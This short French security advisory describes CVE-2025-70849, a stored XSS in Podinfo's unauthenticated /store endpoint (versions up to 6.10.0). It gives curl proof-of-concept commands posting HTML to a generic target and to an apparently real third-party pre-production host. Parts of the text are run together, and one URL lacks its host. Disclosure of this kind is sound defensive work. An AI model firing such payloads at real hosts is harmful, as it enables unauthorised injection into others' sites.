
CVE-2025-70849 : XSS stocké dans Podinfo
Une vulnérabilité de sécurité (CWE-79) a été identifiée dans Podinfo, une application web pour démontrer les microservices Kubernetes. La fonctionnalité /store permet à des utilisateurs non authentifiés de télécharger du contenu HTML/JS arbitraire, conduisant à un XSS stocké.
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'

Accéder au hash retourné : https:///store/